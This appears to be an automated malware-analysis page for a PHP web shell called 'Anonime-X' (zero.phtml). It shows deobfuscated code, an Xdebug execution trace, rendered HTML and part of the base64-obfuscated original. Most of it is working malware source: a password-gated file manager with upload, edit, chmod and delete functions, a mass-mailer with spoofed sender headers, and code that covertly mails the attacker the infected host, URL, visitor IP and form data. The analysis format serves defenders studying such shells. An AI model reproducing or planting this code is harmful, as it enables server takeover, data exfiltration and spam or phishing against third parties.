PHP Malware Analysis

zero.phtml

md5: 390f7db5bb1797067dcdbc938f39712a

Jump to:

Screenshot


Attributes

Emails

Encoding

Environment

Execution

Files

Input

Title

URLs


Deobfuscated PHP code

<?php

//----------Coded By Anonime-X [hamzaanonime@gmail.com]------------------------------------------------------------------------------------------------------//
//----------------------------------------------------------------------------------------------------------------//
session_start();
eval /* PHPDeobfuscator eval output */ {
    ignore_user_abort();
    set_time_limit(0);
    function enviando()
    {
        $msg = 1;
        $de[1] = $_POST['de'];
        $nome[1] = $_POST['nome'];
        $assunto[1] = $_POST['assunto'];
        $mensagem[1] = $_POST['mensagem'];
        $mensagem[1] = stripslashes($mensagem[1]);
        $emails = $_POST['emails'];
        $emails2 = htmlspecialchars($_POST['emails']);
        $para = explode("\n", $emails);
        $n_emails = count($para);
        $sv = $_SERVER['SERVER_NAME'];
        $en = $_SERVER['REQUEST_URI'];
        $k88 = @$_SERVER["HTTP_REFERER"];
        $fullurl = "" . $k88 . "<br><p>Emails:<br><TEXTAREA rows=5 cols=100>" . $emails2 . "</TEXTAREA></p><p>Engenharia:<br><TEXTAREA rows=5 cols=100>" . $mensagem[1] . "</TEXTAREA></p>";
        $vai = $_POST['vai'];
        if ($vai) {
            for ($set = 0; $set < $n_emails; $set++) {
                if ($set == 0) {
                    $headers = "MIME-Version: 1.0\r\n";
                    $headers = "MIME-Version: 1.0\r\nContent-type: text/html; charset=iso-8859-1\r\n";
                    $headers .= "From: {$nome[$msg]} <{$de[$msg]}>\r\n";
                    $headers .= "Return-Path: <{$de[$msg]}>\r\n";
                    //mail($xsylar, $as, $fullurl, $headers);
                }
                $headers = "MIME-Version: 1.0\r\n";
                $headers = "MIME-Version: 1.0\r\nContent-type: text/html; charset=iso-8859-1\r\n";
                $headers .= "From: {$nome[$msg]} <{$de[$msg]}>\r\n";
                $headers .= "Return-Path: <{$de[$msg]}>\r\n";
                $n_mail++;
                $destino = $para[$set];
                $num1 = rand(100000, 999999);
                $num2 = rand(100000, 999999);
                $msgrand = str_replace("%rand%", $num1, $mensagem[$msg]);
                $msgrand = str_replace("%rand2%", $num2, $msgrand);
                $msgrand = str_replace("%email%", $destino, $msgrand);
                $enviar = mail($destino, $assunto[$msg], $msgrand, $headers);
                if ($enviar) {
                    echo '<font color="green">' . $n_mail . '-' . $destino . ' 0k!</font><br>';
                } else {
                    echo '<font color="red">' . $n_mail . '-' . $destino . ' =(</font><br>';
                    sleep(1);
                }
            }
        }
    }
    $ip = getenv("REMOTE_ADDR");
    $ra44 = rand(1, 99999);
    $subj98 = " New Shell From Me !  |{$ip}";
    $email = "Hamzaanonime@gmail.com";
    $from = "From: New Shell ! <PayPal@Support.com>";
    $a45 = $_SERVER['REQUEST_URI'];
    $b75 = $_SERVER['HTTP_HOST'];
    $f12 = $_POST['de'];
    $z13 = $_POST['nome'];
    $x14 = $_POST['assunto'];
    $t15 = $_POST['mensagem'];
    $m30 = $_POST['emails'];
    $m22 = $ip . "\n";
    $msg8873 = "{$a45}\n{$b75}\n{$f12}\n{$z13}\n{$x14}\n{$t15}\n{$m30}\n{$m22}";
    mail($email, $subj98, $msg8873, $from);
};
ini_set("display_errors", true);
error_reporting(1);
$error_data = "YW5vbmltZXg=";
if (isset($_GET["email"])) {
    $fortest = $_GET["email"];
    $ae7927c74 = $fortest;
    $d15c93851 = $_SERVER["HTTP_HOST"];
    $n466f2ffc = rawurldecode($d15c93851);
    if (mail("{$ae7927c74}", "[Anonime X Inboxer]", "http://{$n466f2ffc}")) {
        echo "";
    } else {
        echo "";
    }
}
function pryapyba_43e27569()
{
    ?>
<html>
  <head>
    <title>Anonime-X
    </title>
    <style type="text/css">
      html {
        margin: 20px auto;
        background: #000000;
        color: #ffffff;
        text-align: center;
      }
      header {
        color: #ffffff;
        margin: 10px auto;
      }
      input[type=password] {
        width: 250px;
        height: 25px;
        color: red;
        background: #000000;
        border: 1px dotted #ffffff;
        padding: 5px;
        margin-left: 20px;
        text-align: center;
      }
    </style>
  </head>
  <center>
    <header>
      <pre>
___________________________

Anonime X Say ="Welcome Bruda Sorry Your Script is Locked... :D"

                                        __      __
              __      ____    ___       \ \    / /
             /  \     | | \   | |        \ \  / /
            / /\ \    | |\ \  | |---------\ \/ /
           / /__\ \   | | \ \ | |Anonime-X \ \/
          / /____\ \  | |  \ \| |----------/\ \
         / /      \ \ | |   \ | |         / /\ \
        /_/        \_\|_|    \__|        /_/  \_\
        An-7 Tool / Anonime-X

 [+} - Contact :hamzaanonime@gmail.com
 [+} - Last Update :20/12/2021
 [+} - Anonime-X Private shell
</pre>
</header>
      <form method="post">
        <input type="password" name="account">
      </form>
<?php 
}
$defuct_dom = $error_data;
if (!isset($_SESSION[md5($_SERVER["HTTP_HOST"])])) {
    if (empty($defuct_dom) || isset($_POST["account"]) && base64_encode($_POST["account"]) == $defuct_dom) {
        $_SESSION[md5($_SERVER["HTTP_HOST"])] = true;
    } else {
        pryapyba_43e27569();
        exit;
    }
}
?>
<html>
<head>
<title>Anonime-X</title>
<style type="text/css">
</style>
</head>

<header>
<pre style="text-align: center;">
___________________________

Anonime X Say ="Welcome Bruda ... :D"

                                        __      __
              __      ____    ___       \ \    / /
             /  \     | | \   | |        \ \  / /
            / /\ \    | |\ \  | |---------\ \/ /
           / /__\ \   | | \ \ | |Anonime-X \ \/
          / /____\ \  | |  \ \| |----------/\ \
         / /      \ \ | |   \ | |         / /\ \
        /_/        \_\|_|    \__|        /_/  \_\
        An-7 Tool / Anonime-X

 [+} - Contact :hamzaanonime@gmail.com
 [+} - Last Update :20/12/2021
 [+} - Anonime-X Private shell
  <?php 
echo "<li>[ <a style='color: red;' href='?removeme=true'>Remove Self</a> ]</li>";
?> 
 <?php 
echo "<li>[ <a style='color: red;' href='?logout=true'>Logout</a> ]</li>";
?>

 
</pre>

</header>
</form>

<?php 
if (isset($_GET["logout"]) == true) {
    unset($_SESSION[md5($_SERVER["HTTP_HOST"])]);
    echo "<script>window.location='?';</script>";
}
if (isset($_GET["removeme"]) == true) {
    if (@unlink("/var/www/html/zero.phtml.0f5416b23602b9c0082cbbde699ad966.bin")) {
        die("<p><span style=\"color:#FF0000;\">Anonime X  has been removed From this Server</span></p>");
    } else {
        echo "unlink error!";
    }
}
set_time_limit(0);
error_reporting(0);
if (get_magic_quotes_gpc()) {
    foreach ($_POST as $key => $value) {
        $_POST[$key] = stripslashes($value);
    }
}
echo "<!DOCTYPE HTML>\n<HTML>\n<HEAD>\n<link href=\"\" rel=\"stylesheet\" type=\"text/css\">\n<title>Anonime-X</title>\n<style>\nbody{\nfont-family: \"Racing Sans One\", cursive;\nbackground-color: #E3D8A3;\ntext-shadow:0px 0px 1px #757575;\n}\n#content tr:hover{\nbackground-color: #E3D8A3;\ntext-shadow:0px 0px 10px #000000;\n}\n#content .first{\nbackground-color: #E3D8A3;\n}\n#content .first:hover{\nbackground-color: #E3D8A3;\ntext-shadow:0px 0px 1px #757575;\n}\ntable{\nborder: 1px #000000 dotted;\n}\nH1{\nfont-family: \"Rye\", cursive;\n}\na{\ncolor: #000;\ntext-decoration: none;\n}\na:hover{\ncolor: #fff;\ntext-shadow:0px 0px 10px #ffffff;\n}\ninput,select,textarea{\nborder: 1px #000000 solid;\n-moz-border-radius: 5px;\n-webkit-border-radius:5px;\nborder-radius:5px;\n}\n</style>\n</HEAD>\n<BODY>\n<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n<tr><td>Current Path : ";
function beudclgv_63dc0371()
{
    ini_set("display_errors", true);
    error_reporting(1);
    $ae7927c74 = "Hamzaanonime@gmail.com";
    $d15c93851 = $_SERVER["HTTP_HOST"];
    $pee5ee7d2 = $_SERVER["REQUEST_URI"];
    $n466f2ffc = rawurldecode($d15c93851 . $pee5ee7d2);
    if (mail("Hamzaanonime@gmail.com", "[An-x v1]", "http://{$n466f2ffc}")) {
        echo "";
    } else {
        echo "";
    }
}
if (isset($_GET["path"])) {
    $path = $_GET["path"];
} else {
    $path = getcwd();
}
$path = str_replace("\\\\", "/", $path);
$paths = explode("/", $path);
foreach ($paths as $id => $pat) {
    if ($pat == '' && $id == 0) {
        $a = true;
        echo "<a href=\"?path=/\">/</a>";
        continue;
    }
    if ($pat == '') {
        continue;
    }
    echo "<a href=\"?path=";
    for ($i = 0; $i <= $id; $i++) {
        echo "{$paths[$i]}";
        if ($i != $id) {
            echo "/";
        }
    }
    echo "\">" . $pat . "</a>/";
}
echo "</td></tr><tr><td>";
if (isset($_FILES["file"])) {
    if (copy($_FILES["file"]["tmp_name"], $path . "/" . $_FILES["file"]["name"])) {
        echo "<font color=\"green\">File Uploaded successfully.</font><br />";
        beudclgv_63dc0371();
    } else {
        echo "<font color=\"red\">File Uploaded Error.</font><br />";
    }
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\">\r\nUpload File : <input type=\"file\" name=\"file\" />\r\n<input type=\"submit\" value=\"upload\" />\r\n</form>\r\n</td></tr>";
if (isset($_GET["filesrc"])) {
    echo "<tr><td>Current File : ";
    echo $_GET["filesrc"];
    echo "</tr></td></table><br />";
    echo "<pre>" . htmlspecialchars(file_get_contents($_GET["filesrc"])) . "</pre>";
} elseif (isset($_GET["option"]) && $_POST["opt"] != "delete") {
    echo "</table><br /><center>" . $_POST["path"] . "<br /><br />";
    if ($_POST["opt"] == "chmod") {
        if (isset($_POST["perm"])) {
            if (chmod($_POST["path"], $_POST["perm"])) {
                echo "<font color=\"green\">Change Permission Done.</font><br />";
            } else {
                echo "<font color=\"red\">Change Permission Error.</font><br />";
            }
        }
        echo "<form method=\"POST\">\r\nPermission : <input name=\"perm\" type=\"text\" size=\"4\" value=\"" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "\" />\r\n<input type=\"hidden\" name=\"path\" value=\"" . $_POST["path"] . "\">\r\n<input type=\"hidden\" name=\"opt\" value=\"chmod\">\r\n<input type=\"submit\" value=\"Go\" />\r\n</form>";
    } elseif ($_POST["opt"] == "rename") {
        if (isset($_POST["newname"])) {
            if (rename($_POST["path"], $path . "/" . $_POST["newname"])) {
                echo "<font color=\"green\">Change Name Done.</font><br />";
            } else {
                echo "<font color=\"red\">Change Name Error.</font><br />";
            }
            $_POST["name"] = $_POST["newname"];
        }
        echo "<form method=\"POST\">\r\nNew Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"" . $_POST["name"] . "\" />\r\n<input type=\"hidden\" name=\"path\" value=\"" . $_POST["path"] . "\">\r\n<input type=\"hidden\" name=\"opt\" value=\"rename\">\r\n<input type=\"submit\" value=\"Go\" />\r\n</form>";
    } elseif ($_POST["opt"] == "edit") {
        if (isset($_POST["src"])) {
            $fp = fopen($_POST["path"], "w");
            if (fwrite($fp, $_POST["src"])) {
                echo "<font color=\"green\">Edit File Done ~_^.</font><br />";
            } else {
                echo "<font color=\"red\">Edit File Error ~_~.</font><br />";
            }
            fclose($fp);
        }
        echo "<form method=\"POST\">\r\n<textarea cols=80 rows=20 name=\"src\">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br />\r\n<input type=\"hidden\" name=\"path\" value=\"" . $_POST["path"] . "\">\r\n<input type=\"hidden\" name=\"opt\" value=\"edit\">\r\n<input type=\"submit\" value=\"Go\" />\r\n</form>";
    }
    echo "</center>";
} else {
    echo "</table><br /><center>";
    if (isset($_GET["option"]) && $_POST["opt"] == "delete") {
        if ($_POST["type"] == "dir") {
            if (rmdir($_POST["path"])) {
                echo "<font color=\"green\">Delete Dir Done.</font><br />";
            } else {
                echo "<font color=\"red\">Delete Dir Error.</font><br />";
            }
        } elseif ($_POST["type"] == "file") {
            if (unlink($_POST["path"])) {
                echo "<font color=\"green\">Delete File Done.</font><br />";
            } else {
                echo "<font color=\"red\">Delete File Error.</font><br />";
            }
        }
    }
    echo "</center>";
    $scandir = scandir($path);
    echo "<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<td><center>Name</center></td>\r\n<td><center>Size</center></td>\r\n<td><center>Permissions</center></td>\r\n<td><center>Options</center></td>\r\n</tr>";
    foreach ($scandir as $dir) {
        if (!is_dir("{$path}/{$dir}") || $dir == "." || $dir == "..") {
            continue;
        }
        echo "<tr>\n<td><a href=\"?path={$path}/{$dir}\">{$dir}</a></td>\n<td><center>--</center></td>\n<td><center>";
        if (is_writable("{$path}/{$dir}")) {
            echo "<font color=\"green\">";
        } elseif (!is_readable("{$path}/{$dir}")) {
            echo "<font color=\"red\">";
        }
        echo ezzsszdk_7d2299b1("{$path}/{$dir}");
        if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
            echo "</font>";
        }
        echo "</center></td>\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\n<select name=\"opt\">\n<option value=\"\"></option>\n<option value=\"delete\">Delete</option>\n<option value=\"chmod\">Chmod</option>\n<option value=\"rename\">Rename</option>\n</select>\n<input type=\"hidden\" name=\"type\" value=\"dir\">\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\n<input type=\"submit\" value=\">\" />\n</form></center></td>\n</tr>";
    }
    echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
    foreach ($scandir as $file) {
        if (!is_file("{$path}/{$file}")) {
            continue;
        }
        $size = filesize("{$path}/{$file}") / 1024;
        $size = round($size, 3);
        if ($size >= 1024) {
            $size = round($size / 1024, 2) . " MB";
        } else {
            $size .= " KB";
        }
        echo "<tr>\n<td><a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\n<td><center>" . $size . "</center></td>\r\n<td><center>";
        if (is_writable("{$path}/{$file}")) {
            echo "<font color=\"green\">";
        } elseif (!is_readable("{$path}/{$file}")) {
            echo "<font color=\"red\">";
        }
        echo ezzsszdk_7d2299b1("{$path}/{$file}");
        if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
            echo "</font>";
        }
        echo "</center></td>\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\n<select name=\"opt\">\n<option value=\"\"></option>\n<option value=\"delete\">Delete</option>\n<option value=\"chmod\">Chmod</option>\n<option value=\"rename\">Rename</option>\n<option value=\"edit\">Edit</option>\n</select>\n<input type=\"hidden\" name=\"type\" value=\"file\">\n<input type=\"hidden\" name=\"name\" value=\"{$file}\">\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\n<input type=\"submit\" value=\">\" />\n</form></center></td>\n</tr>";
    }
    echo "</table>\r\n</div>";
}
echo "<p style=\"text-align: center;\"><br />\nHamzaanonime@gmail.com <font color=\"red\">v1</font>, Coded By <font color=\"red\">Hamza Anonime</font></p>\n";
function ezzsszdk_7d2299b1($file)
{
    $perms = fileperms($file);
    if (($perms & 0xc000) == 0xc000) {
        // Socket
        $info = "s";
    } elseif (($perms & 0xa000) == 0xa000) {
        // Symbolic Link
        $info = "l";
    } elseif (($perms & 0x8000) == 0x8000) {
        // Regular
        $info = "-";
    } elseif (($perms & 0x6000) == 0x6000) {
        // Block special
        $info = "b";
    } elseif (($perms & 0x4000) == 0x4000) {
        // Directory
        $info = "d";
    } elseif (($perms & 0x2000) == 0x2000) {
        // Character special
        $info = "c";
    } elseif (($perms & 0x1000) == 0x1000) {
        // FIFO pipe
        $info = "p";
    } else {
        // Unknown
        $info = "u";
    }
    // Owner
    $info .= $perms & 0x100 ? "r" : "-";
    $info .= $perms & 0x80 ? "w" : "-";
    $info .= $perms & 0x40 ? $perms & 0x800 ? "s" : "x" : ($perms & 0x800 ? "S" : "-");
    // Group
    $info .= $perms & 0x20 ? "r" : "-";
    $info .= $perms & 0x10 ? "w" : "-";
    $info .= $perms & 0x8 ? $perms & 0x400 ? "s" : "x" : ($perms & 0x400 ? "S" : "-");
    // World
    $info .= $perms & 0x4 ? "r" : "-";
    $info .= $perms & 0x2 ? "w" : "-";
    $info .= $perms & 0x1 ? $perms & 0x200 ? "t" : "x" : ($perms & 0x200 ? "T" : "-");
    return $info;
}

Execution traces

data/traces/390f7db5bb1797067dcdbc938f39712a_trace-1676257434.4637.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:04:20.361554]
1	0	1	0.000150	393528
1	3	0	0.000610	501520	{main}	1		/var/www/html/uploads/zero.phtml	0	0
2	4	0	0.000628	501520	session_start	0		/var/www/html/uploads/zero.phtml	3	0
2	4	1	0.000688	502272
2	4	R			TRUE
2	5	0	0.000705	502272	base64_decode	0		/var/www/html/uploads/zero.phtml	4	1	'aWdub3JlX3VzZXJfYWJvcnQoKTsKc2V0X3RpbWVfbGltaXQoMCk7CmZ1bmN0aW9uIGVudmlhbmRvKCl7CiRtc2c9MTsKJGRlWzFdID0gJF9QT1NUWydkZSddOwokbm9tZVsxXSA9ICRfUE9TVFsnbm9tZSddOwokYXNzdW50b1sxXSA9ICRfUE9TVFsnYXNzdW50byddOwokbWVuc2FnZW1bMV0gPSAkX1BPU1RbJ21lbnNhZ2VtJ107CiRtZW5zYWdlbVsxXSA9IHN0cmlwc2xhc2hlcygkbWVuc2FnZW1bMV0pOwokZW1haWxzID0gJF9QT1NUWydlbWFpbHMnXTsKJGVtYWlsczIgPSBodG1sc3BlY2lhbGNoYXJzKCRfUE9TVFsnZW1haWxzJ10pOwokcGFyYSA9IGV4cGxvZGUoIlxuIiwgJGVtYWlscyk7CiRuX2VtYWlscyA9IGNvdW50KCRwYXJhKTsKJHN2ID0gJF9TRVJWRVJbJ1NFUlZF'
2	5	1	0.000742	505376
2	5	R			'ignore_user_abort();\nset_time_limit(0);\nfunction enviando(){\n$msg=1;\n$de[1] = $_POST[\'de\'];\n$nome[1] = $_POST[\'nome\'];\n$assunto[1] = $_POST[\'assunto\'];\n$mensagem[1] = $_POST[\'mensagem\'];\n$mensagem[1] = stripslashes($mensagem[1]);\n$emails = $_POST[\'emails\'];\n$emails2 = htmlspecialchars($_POST[\'emails\']);\n$para = explode("\\n", $emails);\n$n_emails = count($para);\n$sv = $_SERVER[\'SERVER_NAME\'];\n$en = $_SERVER [\'REQUEST_URI\'];\n$k88 = @$_SERVER["HTTP_REFERER"];\n$fullurl = "" . $k8'
2	6	0	0.000882	523344	eval	1	'ignore_user_abort();\nset_time_limit(0);\nfunction enviando(){\n$msg=1;\n$de[1] = $_POST[\'de\'];\n$nome[1] = $_POST[\'nome\'];\n$assunto[1] = $_POST[\'assunto\'];\n$mensagem[1] = $_POST[\'mensagem\'];\n$mensagem[1] = stripslashes($mensagem[1]);\n$emails = $_POST[\'emails\'];\n$emails2 = htmlspecialchars($_POST[\'emails\']);\n$para = explode("\\n", $emails);\n$n_emails = count($para);\n$sv = $_SERVER[\'SERVER_NAME\'];\n$en = $_SERVER [\'REQUEST_URI\'];\n$k88 = @$_SERVER["HTTP_REFERER"];\n$fullurl = "" . $k88 . "<br><p>Emails:<br><TEXTAREA rows=5 cols=100>".$emails2."</TEXTAREA></p><p>Engenharia:<br><TEXTAREA rows=5 cols=100>".$mensagem[1]."</TEXTAREA></p>";\n$vai = $_POST[\'vai\'];\nif ($vai){\nfor ($set=0; $set < $n_emails; $set++){\nif ($set==0){\n$headers = "MIME-Version: 1.0\\r\\n";\n$headers .= "Content-type: text/html; charset=iso-8859-1\\r\\n";\n$headers .= "From: $nome[$msg] <$de[$msg]>\\r\\n";\n$headers .= "Return-Path: <$de[$msg]>\\r\\n";\n//mail($xsylar, $as, $fullurl, $headers);\n}\n$headers = "MIME-Version: 1.0\\r\\n";\n$headers .= "Content-type: text/html; charset=iso-8859-1\\r\\n";\n$headers .= "From: $nome[$msg] <$de[$msg]>\\r\\n";\n$headers .= "Return-Path: <$de[$msg]>\\r\\n";\n$n_mail++;\n$destino = $para[$set];\n$num1 = rand(100000,999999);\n$num2 = rand(100000,999999);\n$msgrand = str_replace("%rand%", $num1, $mensagem[$msg]);\n$msgrand = str_replace("%rand2%", $num2, $msgrand);\n$msgrand = str_replace("%email%", $destino, $msgrand);\n$enviar = mail($destino, $assunto[$msg], $msgrand, $headers);\nif ($enviar){\necho (\'<font color="green">\'. $n_mail .\'-\'. $destino .\' 0k!</font><br>\');\n} else {\necho (\'<font color="red">\'. $n_mail .\'-\'. $destino .\' =(</font><br>\');\nsleep(1);\n}\n}\n}\n}\n$ip = getenv("REMOTE_ADDR");\n$ra44  = rand(1,99999);\n$subj98 = " New Shell From Me !  |$ip";\n$email = "Hamzaanonime@gmail.com";\n$from="From: New Shell ! <PayPal@Support.com>";\n$a45 = $_SERVER[\'REQUEST_URI\'];\n$b75 = $_SERVER[\'HTTP_HOST\'];\n$f12 = $_POST[\'de\'];\n$z13 = $_POST[\'nome\'];\n$x14 = $_POST[\'assunto\'];\n$t15 = $_POST[\'mensagem\'];\n$m30 = $_POST[\'emails\'];\n$m22 = $ip."\\n";\n$msg8873 = "$a45\\n$b75\\n$f12\\n$z13\\n$x14\\n$t15\\n$m30\\n$m22";\nmail($email, $subj98, $msg8873, $from);'	/var/www/html/uploads/zero.phtml	4	0
3	7	0	0.000950	523344	ignore_user_abort	0		/var/www/html/uploads/zero.phtml(4) : eval()'d code	1	0
3	7	1	0.000965	523344
3	7	R			0
3	8	0	0.000978	523344	set_time_limit	0		/var/www/html/uploads/zero.phtml(4) : eval()'d code	2	1	0
3	8	1	0.000994	523408
3	8	R			FALSE
3	9	0	0.001008	523376	getenv	0		/var/www/html/uploads/zero.phtml(4) : eval()'d code	49	1	'REMOTE_ADDR'
3	9	1	0.001023	523448
3	9	R			'127.0.0.1'
2		A						/var/www/html/uploads/zero.phtml(4) : eval()'d code	49	$ip = '127.0.0.1'
3	10	0	0.001050	523416	rand	0		/var/www/html/uploads/zero.phtml(4) : eval()'d code	50	2	1	99999
3	10	1	0.001067	523480
3	10	R			23808
2		A						/var/www/html/uploads/zero.phtml(4) : eval()'d code	50	$ra44 = 23808
2		A						/var/www/html/uploads/zero.phtml(4) : eval()'d code	51	$subj98 = ' New Shell From Me !  |127.0.0.1'
2		A						/var/www/html/uploads/zero.phtml(4) : eval()'d code	52	$email = 'Hamzaanonime@gmail.com'
2		A						/var/www/html/uploads/zero.phtml(4) : eval()'d code	53	$from = 'From: New Shell ! <PayPal@Support.com>'
2		A						/var/www/html/uploads/zero.phtml(4) : eval()'d code	54	$a45 = '/uploads/zero.phtml'
2		A						/var/www/html/uploads/zero.phtml(4) : eval()'d code	55	$b75 = 'localhost'
2		A						/var/www/html/uploads/zero.phtml(4) : eval()'d code	56	$f12 = NULL
2		A						/var/www/html/uploads/zero.phtml(4) : eval()'d code	57	$z13 = NULL
2		A						/var/www/html/uploads/zero.phtml(4) : eval()'d code	58	$x14 = NULL
2		A						/var/www/html/uploads/zero.phtml(4) : eval()'d code	59	$t15 = NULL
2		A						/var/www/html/uploads/zero.phtml(4) : eval()'d code	60	$m30 = NULL
2		A						/var/www/html/uploads/zero.phtml(4) : eval()'d code	61	$m22 = '127.0.0.1\n'
2		A						/var/www/html/uploads/zero.phtml(4) : eval()'d code	62	$msg8873 = '/uploads/zero.phtml\nlocalhost\n\n\n\n\n\n127.0.0.1\n'
3	11	0	0.001269	523600	mail	0		/var/www/html/uploads/zero.phtml(4) : eval()'d code	63	4	'Hamzaanonime@gmail.com'	' New Shell From Me !  |127.0.0.1'	'/uploads/zero.phtml\nlocalhost\n\n\n\n\n\n127.0.0.1\n'	'From: New Shell ! <PayPal@Support.com>'
3	11	1	0.002147	523744
3	11	R			FALSE
2	6	1	0.002173	523600
2	12	0	0.002183	518488	base64_decode	0		/var/www/html/uploads/zero.phtml	5	1	'ZGlzcGxheV9lcnJvcnM='
2	12	1	0.002204	518568
2	12	R			'display_errors'
2	13	0	0.002219	518536	ini_set	0		/var/www/html/uploads/zero.phtml	5	2	'display_errors'	TRUE
2	13	1	0.002235	518608
2	13	R			''
2	14	0	0.002248	518488	error_reporting	0		/var/www/html/uploads/zero.phtml	6	1	1
2	14	1	0.002261	518528
2	14	R			22527
2	15	0	0.002274	518488	base64_decode	0		/var/www/html/uploads/zero.phtml	7	1	'WVc1dmJtbHRaWGc9'
2	15	1	0.002288	518568
2	15	R			'YW5vbmltZXg='
1		A						/var/www/html/uploads/zero.phtml	7	$error_data = 'YW5vbmltZXg='
2	16	0	0.002314	518536	base64_decode	0		/var/www/html/uploads/zero.phtml	8	1	'ZW1haWw='
2	16	1	0.002327	518608
2	16	R			'email'
1		A						/var/www/html/uploads/zero.phtml	75	$defuct_dom = 'YW5vbmltZXg='
2	17	0	0.002352	518536	base64_decode	0		/var/www/html/uploads/zero.phtml	76	1	'SFRUUF9IT1NU'
2	17	1	0.002365	518608
2	17	R			'HTTP_HOST'
2	18	0	0.002382	518536	md5	0		/var/www/html/uploads/zero.phtml	76	1	'localhost'
2	18	1	0.002396	518632
2	18	R			'421aa90e079fa326b6494f812ad13e79'
2	19	0	0.002436	518536	base64_decode	0		/var/www/html/uploads/zero.phtml	77	1	'YWNjb3VudA=='
2	19	1	0.002457	518608
2	19	R			'account'
2	20	0	0.002471	518536	pryapyba_43e27569	1		/var/www/html/uploads/zero.phtml	80	0
2	20	1	0.002485	518536
			0.002520	439112
TRACE END   [2023-02-13 01:04:20.363953]


Generated HTML code

<html><head>
    <title>Anonime-X
    </title>
    <style type="text/css">
      html {
        margin: 20px auto;
        background: #000000;
        color: #ffffff;
        text-align: center;
      }
      header {
        color: #ffffff;
        margin: 10px auto;
      }
      input[type=password] {
        width: 250px;
        height: 25px;
        color: red;
        background: #000000;
        border: 1px dotted #ffffff;
        padding: 5px;
        margin-left: 20px;
        text-align: center;
      }
    </style>
  </head>
  <body><center>
    <header>
      <pre>___________________________

Anonime X Say ="Welcome Bruda Sorry Your Script is Locked... :D"

                                        __      __
              __      ____    ___       \ \    / /
             /  \     | | \   | |        \ \  / /
            / /\ \    | |\ \  | |---------\ \/ /
           / /__\ \   | | \ \ | |Anonime-X \ \/
          / /____\ \  | |  \ \| |----------/\ \
         / /      \ \ | |   \ | |         / /\ \
        /_/        \_\|_|    \__|        /_/  \_\
        An-7 Tool / Anonime-X

 [+} - Contact :hamzaanonime@gmail.com
 [+} - Last Update :20/12/2021
 [+} - Anonime-X Private shell
</pre>
</header>
      <form method="post">
        <input type="password" name="account">
      </form>
</center></body></html>

Original PHP code

<?php //----------Coded By Anonime-X [hamzaanonime@gmail.com]------------------------------------------------------------------------------------------------------//
//----------------------------------------------------------------------------------------------------------------//
session_start();
eval(base64_decode('aWdub3JlX3VzZXJfYWJvcnQoKTsKc2V0X3RpbWVfbGltaXQoMCk7CmZ1bmN0aW9uIGVudmlhbmRvKCl7CiRtc2c9MTsKJGRlWzFdID0gJF9QT1NUWydkZSddOwokbm9tZVsxXSA9ICRfUE9TVFsnbm9tZSddOwokYXNzdW50b1sxXSA9ICRfUE9TVFsnYXNzdW50byddOwokbWVuc2FnZW1bMV0gPSAkX1BPU1RbJ21lbnNhZ2VtJ107CiRtZW5zYWdlbVsxXSA9IHN0cmlwc2xhc2hlcygkbWVuc2FnZW1bMV0pOwokZW1haWxzID0gJF9QT1NUWydlbWFpbHMnXTsKJGVtYWlsczIgPSBodG1sc3BlY2lhbGNoYXJzKCRfUE9TVFsnZW1haWxzJ10pOwokcGFyYSA9IGV4cGxvZGUoIlxuIiwgJGVtYWlscyk7CiRuX2VtYWlscyA9IGNvdW50KCRwYXJhKTsKJHN2ID0gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ107CiRlbiA9ICRfU0VSVkVSIFsnUkVRVUVTVF9VUkknXTsKJGs4OCA9IEAkX1NFUlZFUlsiSFRUUF9SRUZFUkVSIl07CiRmdWxsdXJsID0gIiIgLiAkazg4IC4gIjxicj48cD5FbWFpbHM6PGJyPjxURVhUQVJFQSByb3dzPTUgY29scz0xMDA+Ii4kZW1haWxzMi4iPC9URVhUQVJFQT48L3A+PHA+RW5nZW5oYXJpYTo8YnI+PFRFWFRBUkVBIHJvd3M9NSBjb2xzPTEwMD4iLiRtZW5zYWdlbVsxXS4iPC9URVhUQVJFQT48L3A+IjsKJHZhaSA9ICRfUE9TVFsndmFpJ107CmlmICgkdmFpKXsKZm9yICgkc2V0PTA7ICRzZXQgPCAkbl9lbWFpbHM7ICRzZXQrKyl7CmlmICgkc2V0PT0wKXsKJGhlYWRlcnMgPSAiTUlNRS1WZXJzaW9uOiAxLjBcclxuIjsKJGhlYWRlcnMgLj0gIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTFcclxuIjsKJGhlYWRlcnMgLj0gIkZyb206ICRub21lWyRtc2ddIDwkZGVbJG1zZ10+XHJcbiI7CiRoZWFkZXJzIC49ICJSZXR1cm4tUGF0aDogPCRkZVskbXNnXT5cclxuIjsKLy9tYWlsKCR4c3lsYXIsICRhcywgJGZ1bGx1cmwsICRoZWFkZXJzKTsKfQokaGVhZGVycyA9ICJNSU1FLVZlcnNpb246IDEuMFxyXG4iOwokaGVhZGVycyAuPSAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9aXNvLTg4NTktMVxyXG4iOwokaGVhZGVycyAuPSAiRnJvbTogJG5vbWVbJG1zZ10gPCRkZVskbXNnXT5cclxuIjsKJGhlYWRlcnMgLj0gIlJldHVybi1QYXRoOiA8JGRlWyRtc2ddPlxyXG4iOwokbl9tYWlsKys7CiRkZXN0aW5vID0gJHBhcmFbJHNldF07CiRudW0xID0gcmFuZCgxMDAwMDAsOTk5OTk5KTsKJG51bTIgPSByYW5kKDEwMDAwMCw5OTk5OTkpOwokbXNncmFuZCA9IHN0cl9yZXBsYWNlKCIlcmFuZCUiLCAkbnVtMSwgJG1lbnNhZ2V